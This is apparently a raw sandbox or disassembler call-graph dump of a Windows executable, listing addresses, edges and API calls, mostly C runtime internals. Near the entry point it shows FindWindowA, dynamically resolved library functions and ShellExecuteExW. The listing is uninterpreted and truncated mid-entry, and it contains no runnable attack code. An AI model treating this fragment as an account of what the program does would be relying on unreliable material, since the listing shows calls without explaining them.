7413->7415 7416 405806 7414->7416 7417 4057ec GetProcAddress 7414->7417 7418 4057d1 7415->7418 7416->7371 7416->7373 7420 4057d5 7417->7420 7418->7414 7418->7420 7419 4057fc RtlDecodePointer 7419->7416 7420->7416 7420->7419 7422 404a7e 7421->7422 7423 404aa3 7422->7423 7424 40233d __write_nolock 69 API calls 7422->7424 7423->7378 7425 404a83 7424->7425 7426 403b7b __write_nolock 5 API calls 7425->7426 7427 404a93 7426->7427 7427->7378 7429 4049c6 GetProcAddress 7428->7429 7430 4049dc ExitProcess 7428->7430 7429->7430 7431 4049d6 7429->7431 7431->7430 7433 4035f9 7432->7433 7445 40355a 7432->7445 7434 403619 _malloc 5 API calls 7433->7434 7435 4035ff 7434->7435 7437 40233d __write_nolock 68 API calls 7435->7437 7436 404e3b __FF_MSGBANNER 68 API calls 7442 40356f 7436->7442 7438 403605 7437->7438 7438->7293 7439 404c9b __NMSG_WRITE 68 API calls 7439->7442 7441 4035bd RtlAllocateHeap 7441->7445 7442->7436 7442->7439 7443 4049dd _doexit 3 API calls 7442->7443 7442->7445 7443->7442 7444 4035f0 7444->7293 7445->7441 7445->7442 7445->7444 7446 4035e4 7445->7446 7449 4035e2 7445->7449 7451 4034fd 7445->7451 7459 403619 7445->7459 7448 40233d __write_nolock 68 API calls 7446->7448 7448->7449 7450 40233d __write_nolock 68 API calls 7449->7450 7450->7444 7452 403509 __msize 7451->7452 7453 40353a __msize 7452->7453 7454 4025ac __lock 69 API calls 7452->7454 7453->7445 7455 40351f 7454->7455 7462 402df9 7455->7462 7460 4057a9 __decode_pointer 5 API calls 7459->7460 7461 403624 7460->7461 7461->7445 7463 402e25 7462->7463 7465 402ec7 7463->7465 7467 402ebe 7463->7467 7471 402964 7463->7471 7468 403543 7465->7468 7467->7465 7478 402a14 7467->7478 7482 4024d4 LeaveCriticalSection 7468->7482 7470 40354a 7470->7453 7472 402977 HeapReAlloc 7471->7472 7473 4029ab HeapAlloc 7471->7473 7474 402995 7472->7474 7475 402999 7472->7475 7473->7474 7476 4029ce VirtualAlloc 7473->7476 7474->7467 7475->7473 7476->7474 7477 4029e8 HeapFree 7476->7477 7477->7474 7479 402a29 VirtualAlloc 7478->7479 7481 402a70 7479->7481 7481->7465 7482->7470 7484 40268d 7483->7484 7489 40292f 7483->7489 7485 402879 VirtualFree 7484->7485 7484->7489 7486 4028dd 7485->7486 7487 4028ec VirtualFree HeapFree 7486->7487 7486->7489 7493 405ec0 7487->7493 7489->7307 7497 4024d4 LeaveCriticalSection 7490->7497 7492 401d57 7492->7300 7494 405ed8 7493->7494 7495 405eff __VEC_memcpy 7494->7495 7496 405f07 7494->7496 7495->7496 7496->7489 7497->7492 7498->7312 7499->7212 7501 406b50 7500->7501 7502 406b42 7500->7502 7505 406b7b 7501->7505 7506 40233d __write_nolock 69 API calls 7501->7506 7503 40233d __write_nolock 69 API calls 7502->7503 7504 406b47 7503->7504 7504->7141 7505->7141 7507 406b64 7506->7507 7508 403b7b __write_nolock 5 API calls 7507->7508 7509 406b74 7508->7509 7509->7141 7533 405930 GetLastError 7510->7533 7512 4059c6 GetConsoleMode 7512->7137 7512->7150 7513 4059b9 7513->7512 7514 404993 __amsg_exit 69 API calls 7513->7514 7514->7512 7604 409ff2 7515->7604 7517 40966c 7518 409674 7517->7518 7519 409685 SetFilePointer 7517->7519 7520 40233d __write_nolock 69 API calls 7518->7520 7521 40969d GetLastError 7519->7521 7522 4086c7 7519->7522 7520->7522 7521->7522 7523 4096a7 7521->7523 7522->7126 7524 402363 __dosmaperr 69 API calls 7523->7524 7524->7522 7618 407852 7525->7618 7529 402350 __write_nolock 69 API calls 7528->7529 7530 402369 __dosmaperr 7529->7530 7531 40233d __write_nolock 69 API calls 7530->7531 7532 40237d 7531->7532 7532->7117 7548 405815 TlsGetValue 7533->7548 7536 405953 7537 4059a7 SetLastError 7536->7537 7553 405e2b 7536->7553 7537->7513 7540 4057a9 __decode_pointer 5 API calls 7541 40597f 7540->7541 7542 405986 7541->7542 7543 40599e 7541->7543 7559 40587c 7542->7559 7545 401cfa __freefls@4 65 API calls 7543->7545 7547 4059a4 7545->7547 7546 40598e GetCurrentThreadId 7546->7537 7547->7537 7549 405825 7548->7549 7550 40583e TlsGetValue 7548->7550 7551 4057a9 __decode_pointer 5 API calls 7549->7551 7550->7536 7552 405830 TlsSetValue 7551->7552 7552->7550 7555 405e2f 7553->7555 7556 405965 7555->7556 7557 405e4f Sleep 7555->7557 7570 407f71 7555->7570 7556->7537 7556->7540 7558 405e64 7557->7558 7558->7555 7558->7556 7587 4030dc 7559->7587 7561 405888 GetModuleHandleA 7562 4058aa GetProcAddress GetProcAddress 7561->7562 7563 4058ce InterlockedIncrement 7561->7563 7562->7563 7564 4025ac __lock 65 API calls 7563->7564 7565 4058f5 7564->7565 7588 407393 InterlockedIncrement 7565->7588 7567 405914 7600 405927 7567->7600 7569 405921 __msize 7569->7546 7571 407f7d __msize 7570->7571 7572 407f95 7571->7572 7582 407fb4 _memset 7571->7582 7573 40233d __write_nolock 68 API calls 7572->7573 7574 407f9a 7573->7574 7575 403b7b __write_nolock 5 API calls 7574->7575 7578 407faa __msize 7575->7578 7576 408026 RtlAllocateHeap 7576->7582 7577 4025ac __lock 68 API calls 7577->7582 7578->7555 7579 403619 _malloc 5 API calls 7579->7582 7580 402df9 ___sbh_alloc_block 5 API calls 7580->7582 7582->7576 7582->7577 7582->7578 7582->7579 7582->7580 7583 40806d 7582->7583 7586 4024d4 LeaveCriticalSection 7583->7586 7585 408074 7585->7582 7586->7585 7587->7561 7589 4073b1 7588->7589 7590 4073ae InterlockedIncrement 7588->7590 7591 4073bb InterlockedIncrement 7589->7591 7592 4073be 7589->7592 7590->7589 7591->7592 7593 4073c8 InterlockedIncrement 7592->7593 7594 4073cb 7592->7594 7593->7594 7595 4073d5 InterlockedIncrement 7594->7595 7597 4073d8 7594->7597 7595->7597 7596 4073ed InterlockedIncrement 7596->7597 7597->7596 7598 407406 InterlockedIncrement 7597->7598 7599 4073fd InterlockedIncrement 7597->7599 7598->7567 7599->7597 7603 4024d4 LeaveCriticalSection 7600->7603 7602 40592e 7602->7569 7603->7602 7605 40a012 7604->7605 7606 409ffb 7604->7606 7608 402350 __write_nolock 69 API calls 7605->7608 7610 40a05f 7605->7610 7607 402350 __write_nolock 69 API calls 7606->7607 7609 40a000 7607->7609 7611 40a040 7608->7611 7612 40233d __write_nolock 69 API calls 7609->7612 7610->7517 7613 40233d __write_nolock 69 API calls 7611->7613 7614 40a008 7612->7614 7615 40a047 7613->7615 7614->7517 7616 403b7b __write_nolock 5 API calls 7615->7616 7617 40a057 7616->7617 7617->7517 7621 403ed8 7618->7621 7622 403ee7 7621->7622 7628 403f34 7621->7628 7623 4059b3 __write_nolock 69 API calls 7622->7623 7624 403eec 7623->7624 7625 403f14 7624->7625 7629 4074e3 7624->7629 7625->7628 7644 406dd2 7625->7644 7628->7173 7630 4074ef __msize 7629->7630 7631 4059b3 __write_nolock 69 API calls 7630->7631 7632 4074f4 7631->7632 7633 407522 7632->7633 7635 407506 7632->7635 7634 4025ac __lock 69 API calls 7633->7634 7636 407529 7634->7636 7637 4059b3 __write_nolock 69 API calls 7635->7637 7660 4074a5 7636->7660 7640 40750b 7637->7640 7642 407519 __msize 7640->7642 7643 404993 __amsg_exit 69 API calls 7640->7643 7642->7625 7643->7642 7645 406dde __msize 7644->7645 7646 4059b3 __write_nolock 69 API calls 7645->7646 7647 406de3 7646->7647 7648 4025ac __lock 69 API calls 7647->7648 7649 406df5 7647->7649 7650 406e13 7648->7650 7652 406e03 __msize 7649->7652 7656 404993 __amsg_exit 69 API calls 7649->7656 7651 406e5c 7650->7651 7653 406e44 InterlockedIncrement 7650->7653 7654 406e2a InterlockedDecrement 7650->7654 7828 406e6d 7651->7828 7652->7628 7653->7651 7654->7653 7657 406e35 7654->7657 7656->7652 7657->7653 7658 401cfa __freefls@4 69 API calls 7657->7658 7659 406e43 7658->7659 7659->7653 7661 4074a9 7660->7661 7667 4074db 7660->7667 7662 407393 ___addlocaleref 8 API calls 7661->7662 7661->7667 7663 4074bc 7662->7663 7663->7667 7671 407419 7663->7671 7668 40754d 7667->7668 7827 4024d4 LeaveCriticalSection 7668->7827 7670 407554 7670->7640 7672 4074a1 7671->7672 7673 407422 InterlockedDecrement 7671->7673 7672->7667 7685 407253 7672->7685 7674 407438 InterlockedDecrement 7673->7674 7675 40743b 7673->7675 7674->7675 7676 407445 InterlockedDecrement 7675->7676 7677 407448 7675->7677 7676->7677 7678 407452 InterlockedDecrement 7677->7678 7679 407455 7677->7679 7678->7679 7680 407462 7679->7680 7681 40745f InterlockedDecrement 7679->7681 7682 407477 InterlockedDecrement 7680->7682 7683 407487 InterlockedDecrement 7680->7683 7684 407490 InterlockedDecrement 7680->7684 7681->7680 7682->7680 7683->7680 7684->7672 7686 4072d4 7685->7686 7687 407267 7685->7687 7688 407321 7686->7688 7689 401cfa __freefls@4 69 API calls 7686->7689 7687->7686 7696 401cfa __freefls@4 69 API calls 7687->7696 7713 40729b 7687->7713 7698 407348 7688->7698 7739 40935f 7688->7739 7691 4072f5 7689->7691 7693 401cfa __freefls@4 69 API calls 7691->7693 7699 407308 7693->7699 7694 401cfa __freefls@4 69 API calls 7703 4072c9 7694->7703 7695 407387 7704 401cfa __freefls@4 69 API calls 7695->7704 7705 407290 7696->7705 7697 401cfa __freefls@4 69 API calls 7697->7698 7698->7695 7701 401cfa 69 API calls __freefls@4 7698->7701 7702 401cfa __freefls@4 69 API calls 7699->7702 7700 401cfa __freefls@4 69 API calls 7706 4072b1 7700->7706 7701->7698 7707 407316 7702->7707 7708 401cfa __freefls@4 69 API calls 7703->7708 7709 40738d 7704->7709 7715 40952f 7705->7715 7731 4094ef 7706->7731 7712 401cfa __freefls@4 69 API calls 7707->7712 7708->7686 7709->7667 7712->7688 7713->7700 7714 4072bc 7713->7714 7714->7694 7716 409538 7715->7716 7730 4095b5 7715->7730 7717 409549 7716->7717 7718 401cfa __freefls@4 69 API calls 7716->7718 7719 40955b 7717->7719 7721 401cfa __freefls@4 69 API calls 7717->7721 7718->7717 7720 40956d 7719->7720 7722 401cfa __freefls@4 69 API calls 7719->7722 7723 401cfa __freefls@4 69 API calls 7720->7723 7724 40957f 7720->7724 7721->7719 7722->7720 7723->7724 7725 401cfa __freefls@4 69 API calls 7724->7725 7727 409591 7724->7727 7725->7727 7726 4095a3 7729 401cfa __freefls@4 69 API calls 7726->7729 7726->7730 7727->7726 7728 401cfa __freefls@4 69 API calls 7727->7728 7728->7726 7729->7730 7730->7713 7732 4094f8 7731->7732 7738 40952c 7731->7738 7733 409508 7732->7733 7734 401cfa __freefls@4 69 API calls 7732->7734 7735 40951a 7733->7735 7736 401cfa __freefls@4 69 API calls 7733->7736 7734->7733 7737 401cfa __freefls@4 69 API calls 7735->7737 7735->7738 7736->7735 7737->7738 7738->7714 7740 40936c 7739->7740 7741 407341 7739->7741 7742 401cfa __freefls@4 69 API calls 7740->7742 7741->7697 7743 409374 7742->7743 7744 401cfa __freefls@4 69 API calls 7743->7744 7745 40937c 7744->7745 7746 401cfa __freefls@4 69 API calls 7745->7746 7747 409384 7746->7747 7748 401cfa __freefls@4 69 API calls 7747->7748 7749 40938c 7748->7749 7750 401cfa __freefls@4 69 API calls 7749->7750 7751 409394 7750->7751 7752 401cfa __freefls@4 69 API calls 7751->7752 7753 40939c 7752->7753 7754 401cfa __freefls@4 69 API calls 7753->7754 7755 4093a3 7754->7755 7756 401cfa __freefls@4 69 API calls 7755->7756 7757 4093ab 7756->7757 7758 401cfa __freefls@4 69 API calls 7757->7758 7759 4093b3 7758->7759 7760 401cfa __freefls@4 69 API calls 7759->7760 7761 4093bb 7760->7761 7762 401cfa __freefls@4 69 API calls 7761->7762 7763 4093c3 7762->7763 7764 401cfa __freefls@4 69 API calls 7763->7764 7765 4093cb 7764->7765 7766 401cfa __freefls@4 69 API calls 7765->7766 7767 4093d3 7766->7767 7768 401cfa __freefls@4 69 API calls 7767->7768 7769 4093db 7768->7769 7770 401cfa __freefls@4 69 API calls 7769->7770 7771 4093e3 7770->7771 7772 401cfa __freefls@4 69 API calls 7771->7772 7773 4093eb 7772->7773 7774 401cfa __freefls@4 69 API calls 7773->7774 7775 4093f6 7774->7775 7776 401cfa __freefls@4 69 API calls 7775->7776 7777 4093fe 7776->7777 7778 401cfa __freefls@4 69 API calls 7777->7778 7779 409406 7778->7779 7780 401cfa __freefls@4 69 API calls 7779->7780 7781 40940e 7780->7781 7782 401cfa __freefls@4 69 API calls 7781->7782 7783 409416 7782->7783 7784 401cfa __freefls@4 69 API calls 7783->7784 7785 40941e 7784->7785 7786 401cfa __freefls@4 69 API calls 7785->7786 7787 409426 7786->7787 7788 401cfa __freefls@4 69 API calls 7787->7788 7789 40942e 7788->7789 7790 401cfa __freefls@4 69 API calls 7789->7790 7791 409436 7790->7791 7792 401cfa __freefls@4 69 API calls 7791->7792 7793 40943e 7792->7793 7794 401cfa __freefls@4 69 API calls 7793->7794 7795 409446 7794->7795 7796 401cfa __freefls@4 69 API calls 7795->7796 7797 40944e 7796->7797 7798 401cfa __freefls@4 69 API calls 7797->7798 7799 409456 7798->7799 7800 401cfa __freefls@4 69 API calls 7799->7800 7801 40945e 7800->7801 7802 401cfa __freefls@4 69 API calls 7801->7802 7803 409466 7802->7803 7804 401cfa __freefls@4 69 API calls 7803->7804 7805 40946e 7804->7805 7806 401cfa __freefls@4 69 API calls 7805->7806 7807 40947c 7806->7807 7808 401cfa __freefls@4 69 API calls 7807->7808 7809 409487 7808->7809 7810 401cfa __freefls@4 69 API calls 7809->7810 7811 409492 7810->7811 7812 401cfa __freefls@4 69 API calls 7811->7812 7813 40949d 7812->7813 7814 401cfa __freefls@4 69 API calls 7813->7814 7815 4094a8 7814->7815 7816 401cfa __freefls@4 69 API calls 7815->7816 7817 4094b3 7816->7817 7818 401cfa __freefls@4 69 API calls 7817->7818 7819 4094be 7818->7819 7820 401cfa __freefls@4 69 API calls 7819->7820 7821 4094c9 7820->7821 7822 401cfa __freefls@4 69 API calls 7821->7822 7823 4094d4 7822->7823 7824 401cfa __freefls@4 69 API calls 7823->7824 7825 4094df 7824->7825 7826 401cfa __freefls@4 69 API calls 7825->7826 7826->7741 7827->7670 7831 4024d4 LeaveCriticalSection 7828->7831 7830 406e74 7830->7649 7831->7830 7832->7189 7852 40203f 7902 4030dc 7852->7902 7854 40204b GetProcessHeap HeapAlloc 7855 402068 7854->7855 7856 40207a GetVersionExA 7854->7856 8039 401fda 7855->8039 7857 402095 GetProcessHeap HeapFree 7856->7857 7858 40208a GetProcessHeap HeapFree 7856->7858 7860 4020c1 7857->7860 7861 40206f __msize 7858->7861 7903 4023dc HeapCreate 7860->7903 7863 402100 7864 40210c 7863->7864 7865 401fda _fast_error_exit 69 API calls 7863->7865 7913 405aec GetModuleHandleA 7864->7913 7865->7864 7867 402112 7868 40211d __RTC_Initialize 7867->7868 7869 401fda _fast_error_exit 69 API calls 7867->7869 7946 4054b5 7868->7946 7869->7868 7871 40212c 7872 404993 __amsg_exit 69 API calls 7871->7872 7874 402137 7871->7874 7872->7874 7963 405416 7874->7963 7879 402151 7880 402155 7879->7880 7881 40215d 7879->7881 7882 404993 __amsg_exit 69 API calls 7880->7882 8002 404fe4 7881->8002 7884 40215c 7882->7884 7884->7881 7886 402166 7888 404993 __amsg_exit 69 API calls 7886->7888 7887 40216e 8014 404aaf 7887->8014 7890 40216d 7888->7890 7890->7887 7891 402175 7892 402181 7891->7892 7893 40217a 7891->7893 8020 401bff FindWindowA 7892->8020 7894 404993 __amsg_exit 69 API calls 7893->7894 7896 402180 7894->7896 7896->7892 7898 4021af 8051 404c31 7898->8051 7902->7854 7904 4023fc 7903->7904 7905 4023ff 7903->7905 7904->7863 8054 402381 7905->8054 7908 402432 7908->7863 7909 40240e 8063 4025dd HeapAlloc 7909->8063 7912 40241d HeapDestroy 7912->7904 7914 405b07 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7913->7914 7915 405afe 7913->7915 7917 405b51 TlsAlloc 7914->7917 8065 40583f 7915->8065 7920 405c6b 7917->7920 7921 405b9f TlsSetValue 7917->7921 7920->7867 7921->7920 7922 405bb0 7921->7922 8071 404c4f 7922->8071 7925 40573d __encode_pointer 5 API calls 7926 405bc0 7925->7926 7927 40573d __encode_pointer 5 API calls 7926->7927 7928 405bd0 7927->7928 7929 40573d __encode_pointer 5 API calls 7928->7929 7930 405be0 7929->7930 7931 40573d __encode_pointer 5 API calls 7930->7931 7932 405bf0 7931->7932 8078 402436 7932->8078 7935 405c66 7937 40583f __mtterm 6 API calls 7935->7937 7936 4057a9 __decode_pointer 5 API calls 7938 405c11 7936->7938 7937->7920 7938->7935 7939 405e2b __calloc_crt 69 API calls 7938->7939 7940 405c2a 7939->7940 7940->7935 7941 4057a9 __decode_pointer 5 API calls 7940->7941 7942 405c44 7941->7942 7942->7935 7943 405c4b 7942->7943 7944 40587c __initptd 69 API calls 7943->7944 7945 405c53 GetCurrentThreadId 7944->7945 7945->7920 8085 4030dc 7946->8085 7948 4054c1 GetStartupInfoA 7949 405e2b __calloc_crt 69 API calls 7948->7949 7952 4054e2 7949->7952 7950 405633 7953 405669 GetStdHandle 7950->7953 7954 4056ce SetHandleCount 7950->7954 7956 40567b GetFileType 7950->7956 7962 405692 7950->7962 7951 4056ec __msize 7951->7871 7952->7950 7952->7951 7955 405e2b __calloc_crt 69 API calls 7952->7955 7957 4055b6 7952->7957 7953->7950 7954->7951 7955->7952 7956->7950 7957->7950 7958 4055ea 7957->7958 7959 4055df GetFileType 7957->7959 7958->7951 7958->7957 7961 405d26 ___crtInitCritSecAndSpinCount 69 API calls 7958->7961 7959->7957 7959->7958 7960 405d26 ___crtInitCritSecAndSpinCount 69 API calls 7960->7962 7961->7958 7962->7950 7962->7951 7962->7960 7964 405456 7963->7964 7965 405429 GetCommandLineW 7963->7965 7966 40545b GetCommandLineW 7964->7966 7967 405446 7964->7967 7968 40543b GetLastError 7965->7968 7969 40542f 7965->7969 7975 40213d 7966->7975 7970 405464 GetCommandLineA MultiByteToWideChar 7967->7970 7967->7975 7968->7967 7968->7975 7969->7966 7971 405484 7970->7971 7970->7975 7972 405e2b __calloc_crt 69 API calls 7971->7972 7973 40548c 7972->7973 7974 405494 MultiByteToWideChar 7973->7974 7973->7975 7974->7975 7976 4054a7 7974->7976 7978 4052b5 7975->7978 7977 401cfa __freefls@4 69 API calls 7976->7977 7977->7975 7979 4052ec 7978->7979 7980 4052cd GetEnvironmentStringsW 7978->7980 7981 4052d5 7979->7981 7982 405354 7979->7982 7980->7981 7983 4052e1 GetLastError 7980->7983 7985 405313 7981->7985 7986 405304 GetEnvironmentStringsW 7981->7986 7984 40535d GetEnvironmentStrings 7982->7984 7995 402147 7982->7995 7983->7979 7993 40536b _strlen 7984->7993 7984->7995 7989 405deb __malloc_crt 69 API calls 7985->7989 7986->7985 7986->7995 7987 405372 MultiByteToWideChar 7987->7993 7987->7995 7988 405395 7990 405e2b __calloc_crt 69 API calls 7988->7990 7991 405334 _memcpy_s 7989->7991 8001 4053a2 __wsetenvp _strlen 7990->8001 7992 40533b FreeEnvironmentStringsW 7991->7992 7992->7995 7993->7987 7993->7988 7994 4053aa FreeEnvironmentStringsA 7994->7995 8047 40520a GetModuleFileNameW 7995->8047 7996 4053c0 MultiByteToWideChar 7998 40540d 7996->7998 7996->8001 7997 4053fa FreeEnvironmentStringsA 7997->7995 7999 401cfa __freefls@4 69 API calls 7998->7999 8000 405413 7999->8000 8000->7994 8001->7994 8001->7996 8001->7997 8003 404ffd __wsetenvp 8002->8003 8005 402162 8002->8005 8004 405e2b __calloc_crt 69 API calls 8003->8004 8012 405021 __wsetenvp 8004->8012 8005->7886 8005->7887 8006 405083 8007 401cfa __freefls@4 69 API calls 8006->8007 8007->8005 8008 405e2b __calloc_crt 69 API calls 8008->8012 8009 4050a8 8010 401cfa __freefls@4 69 API calls 8009->8010 8010->8005 8012->8005 8012->8006 8012->8008 8012->8009 8013 403a7f __invoke_watson 10 API calls 8012->8013 8086 407eef 8012->8086 8013->8012 8015 404ab8 __except_handler4 8014->8015 8095 4076b9 8015->8095 8017 404ad7 __initterm_e 8019 404af8 __except_handler4 8017->8019 8099 4034eb 8017->8099 8019->7891 8197 4011f5 LoadLibraryA 8020->8197 8023 401c82 8026 401cc8 8023->8026 8200 401237 LoadLibraryA 8023->8200 8225 401a7c 8026->8225 8028 401cb1 8203 401f15 8028->8203 8029 401ccd 8031 401ceb __write_nolock 5 API calls 8029->8031 8033 401cde 8031->8033 8032 401cbb 8220 4012d3 LoadLibraryA GetProcAddress 8032->8220 8033->7898 8036 404c0f 8033->8036 8472 404b41 8036->8472 8038 404c1c 8038->7898 8040 401fe3 8039->8040 8041 401fe8 8039->8041 8042 404e3b __FF_MSGBANNER 69 API calls 8040->8042 8043 404c9b __NMSG_WRITE 69 API calls 8041->8043 8042->8041 8044 401ff1 8043->8044 8045 4049dd _doexit 3 API calls 8044->8045 8046 401ffb 8045->8046 8046->7861 8048 40523c _wparse_cmdline 8047->8048 8049 405deb __malloc_crt 69 API calls 8048->8049 8050 40527f _wparse_cmdline 8048->8050 8049->8050 8050->7879 8052 404b41 _doexit 69 API calls 8051->8052 8053 4021b4 8052->8053 8053->7861 8055 404a3c ___crtInitCritSecAndSpinCount 69 API calls 8054->8055 8056 402398 8055->8056 8057 4023a7 8056->8057 8058 403a7f __invoke_watson 10 API calls 8056->8058 8059 404a73 ___crtMessageBoxA 69 API calls 8057->8059 8058->8057 8060 4023b3 8059->8060 8061 403a7f __invoke_watson 10 API calls 8060->8061 8062 4023c2 8060->8062 8061->8062 8062->7908 8062->7909 8064 402418 8063->8064 8064->7908 8064->7912 8066 405849 8065->8066 8067 405855 8065->8067 8068 4057a9 __decode_pointer 5 API calls 8066->8068 8069 405877 8067->8069 8070 405869 TlsFree 8067->8070 8068->8067 8069->8069 8070->8069 8072 4057a0 __init_pointers 5 API calls 8071->8072 8073 404c55 __init_pointers 8072->8073 8082 4079b8 8073->8082 8076 40573d __encode_pointer 5 API calls 8077 404c91 8076->8077 8077->7925 8079 40243f 8078->8079 8080 405d26 ___crtInitCritSecAndSpinCount 69 API calls 8079->8080 8081 40246d 8079->8081 8080->8079 8081->7935 8081->7936 8083 40573d __encode_pointer 5 API calls 8082->8083 8084 404c87 8083->8084 8084->8076 8085->7948 8087 407f04 8086->8087 8088 407efc 8086->8088 8089 40233d __write_nolock 69 API calls 8087->8089 8088->8087 8091 407f2c 8088->8091 8094 407f09 8089->8094 8090 403b7b __write_nolock 5 API calls 8092 407f18 8090->8092 8091->8092 8093 40233d __write_nolock 69 API calls 8091->8093 8092->8012 8093->8094 8094->8090 8097 4076bd 8095->8097 8096 40573d __encode_pointer 5 API calls 8096->8097 8097->8096 8098 4076d5 8097->8098 8098->8017 8102 4034af 8099->8102 8101 4034f4 8101->8019 8103 4034bb __msize 8102->8103 8110 4049f2 8103->8110 8109 4034dc __msize 8109->8101 8111 4025ac __lock 69 API calls 8110->8111 8112 4034c0 8111->8112 8113 4033d3 8112->8113 8114 4057a9 __decode_pointer 5 API calls 8113->8114 8115 4033e3 8114->8115 8116 4057a9 __decode_pointer 5 API calls 8115->8116 8117 4033f4 8116->8117 8121 40346e 8117->8121 8131 40655b 8117->8131 8119 403459 8120 40573d __encode_pointer 5 API calls 8119->8120 8120->8121 8128 4034e5 8121->8128 8122 403430 8122->8121 8125 405e73 __realloc_crt 75 API calls 8122->8125 8126 403447 8122->8126 8123 40340e 8123->8119 8123->8122 8144 405e73 8123->8144 8125->8126 8126->8121 8127 40573d __encode_pointer 5 API calls 8126->8127 8127->8119 8193 4049fb 8128->8193 8132 406567 __msize 8131->8132 8133 406594 8132->8133 8134 406577 8132->8134 8136 4065d5 HeapSize 8133->8136 8138 4025ac __lock 69 API calls 8133->8138 8135 40233d __write_nolock 69 API calls 8134->8135 8137 40657c 8135->8137 8140 40658c __msize 8136->8140 8139 403b7b __write_nolock 5 API calls 8137->8139 8141 4065a4 ___sbh_find_block 8138->8141 8139->8140 8140->8123 8149 4065f5 8141->8149 8147 405e77 8144->8147 8146 405eb9 8146->8122 8147->8146 8148 405e9a Sleep 8147->8148 8153 40808f 8147->8153 8148->8147 8152 4024d4 LeaveCriticalSection 8149->8152 8151 4065d0 8151->8136 8151->8140 8152->8151 8154 40809b __msize 8153->8154 8155 4080b0 8154->8155 8156 4080a2 8154->8156 8158 4080c3 8155->8158 8159 4080b7 8155->8159 8157 40354c _malloc 69 API calls 8156->8157 8175 4080aa __dosmaperr __msize 8157->8175 8165 408235 8158->8165 8182 4080d0 _memcpy_s ___sbh_resize_block ___sbh_find_block 8158->8182 8160 401cfa __freefls@4 69 API calls 8159->8160 8160->8175 8161 408268 8163 403619 _malloc 5 API calls 8161->8163 8162 40823a HeapReAlloc 8162->8165 8162->8175 8166 40826e 8163->8166 8164 4025ac __lock 69 API calls 8164->8182 8165->8161 8165->8162 8167 40828c 8165->8167 8169 403619 _malloc 5 API calls 8165->8169 8171 408282 8165->8171 8168 40233d __write_nolock 69 API calls 8166->8168 8170 40233d __write_nolock 69 API calls 8167->8170 8167->8175 8168->8175 8169->8165 8172 408295 GetLastError 8170->8172 8174 40233d __write_nolock 69 API calls 8171->8174 8172->8175 8177 408203 8174->8177 8175->8147 8176 40815b HeapAlloc 8176->8182 8177->8175 8178 408208 GetLastError 8177->8178 8178->8175 8179 4081b0 HeapReAlloc 8179->8182 8180 402df9 ___sbh_alloc_block 5 API calls 8180->8182 8181 40821b 8181->8175 8184 40233d __write_nolock 69 API calls 8181->8184 8182->8161 8182->8164 8182->8175 8182->8176 8182->8179 8182->8180 8182->8181 8183 403619 _malloc 5 API calls 8182->8183 8186 4081fe 8182->8186 8188 402650 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 8182->8188 8189 4081d3 8182->8189 8183->8182 8185 408228 8184->8185 8185->8172 8185->8175 8187 40233d __write_nolock 69 API calls 8186->8187 8187->8177 8188->8182 8192 4024d4 LeaveCriticalSection 8189->8192 8191 4081da 8191->8182 8192->8191 8196 4024d4 LeaveCriticalSection 8193->8196 8195 4034ea 8195->8109 8196->8195 8198 401ceb __write_nolock 5 API calls 8197->8198 8199 401235 GetProcAddress 8198->8199 8199->8023 8201 401ceb __write_nolock 5 API calls 8200->8201 8202 40127f GetProcAddress 8201->8202 8202->8028 8204 401f21 __msize 8203->8204 8205 401f4c __stbuf 8204->8205 8206 401f2f 8204->8206 8240 403d9e 8205->8240 8207 40233d __write_nolock 69 API calls 8206->8207 8208 401f34 8207->8208 8210 403b7b __write_nolock 5 API calls 8208->8210 8212 401f44 __msize 8210->8212 8211 401f5e __stbuf 8245 403e13 8211->8245 8212->8032 8214 401f70 __stbuf 8252 403ffb 8214->8252 8216 401f88 __stbuf 8289 403ea9 8216->8289 8221 403690 _memset 8220->8221 8222 401329 ShellExecuteExW 8221->8222 8223 401ceb __write_nolock 5 API calls 8222->8223 8224 401363 8223->8224 8224->8026 8224->8029 8226 4011f5 6 API calls 8225->8226 8227 401b8e GetProcAddress 8226->8227 8228 401bac 8227->8228 8229 4011b7 6 API calls 8228->8229 8230 401bb9 GetProcAddress 8229->8230 8231 401bc0 8230->8231 8234 401bd5 8231->8234 8341 401606 8231->8341 8233 401606 112 API calls 8233->8234 8234->8233 8235 401be7 8234->8235 8378 401365 8235->8378 8238 401ceb __write_nolock 5 API calls 8239 401bfb 8238->8239 8239->8029 8241 403db2 EnterCriticalSection 8240->8241 8242 403da7 8240->8242 8241->8211 8243 4025ac __lock 69 API calls 8242->8243 8244 403db0 8243->8244 8244->8211 8297 406b97 8245->8297 8247 403e1e 8248 406b39 __write_nolock 69 API calls 8247->8248 8249 403e24 __stbuf 8248->8249 8250 403e70 8249->8250 8251 405deb __malloc_crt 69 API calls 8249->8251 8250->8214 8251->8250 8253 403ed8 _LocaleUpdate::_LocaleUpdate 79 API calls 8252->8253 8254 404056 8253->8254 8255 40405b 8254->8255 8256 40411c 8254->8256 8258 406b97 __output_l 69 API calls 8254->8258 8257 40233d __write_nolock 69 API calls 8255->8257 8256->8255 8285 404141 __output_l __aulldvrm _strlen 8256->8285 8259 404060 8257->8259 8260 40409b 8258->8260 8262 403b7b __write_nolock 5 API calls 8259->8262 8261 4040c9 8260->8261 8263 406b97 __output_l 69 API calls 8260->8263 8261->8255 8267 406b97 __output_l 69 API calls 8261->8267 8264 404070 8262->8264 8266 4040a9 8263->8266 8265 401ceb __write_nolock 5 API calls 8264->8265 8268 404968 8265->8268 8266->8261 8270 406b97 __output_l 69 API calls 8266->8270 8269 4040ee 8267->8269 8268->8216 8269->8256 8273 406b97 __output_l 69 API calls 8269->8273 8271 4040b7 8270->8271 8274 406b97 __output_l 69 API calls 8271->8274 8272 407852 __isleadbyte_l 79 API calls 8272->8285 8275 4040fc 8273->8275 8274->8261 8275->8256 8277 406b97 __output_l 69 API calls 8275->8277 8276 403f5a 103 API calls _write_multi_char 8276->8285 8279 40410a 8277->8279 8278 404931 8282 40233d __write_nolock 69 API calls 8278->8282 8281 406b97 __output_l 69 API calls 8279->8281 8280 401cfa __freefls@4 69 API calls 8280->8285 8281->8256 8282->8259 8283 407837 81 API calls _wctomb_s 8283->8285 8284 405deb __malloc_crt 69 API calls 8284->8285 8285->8264 8285->8272 8285->8276 8285->8278 8285->8280 8285->8283 8285->8284 8286 403f8d 103 API calls _write_multi_char 8285->8286 8287 403fb1 103 API calls _write_string 8285->8287 8288 4057a9 5 API calls __decode_pointer 8285->8288 8286->8285 8287->8285 8288->8285 8290 403eb0 8289->8290 8291 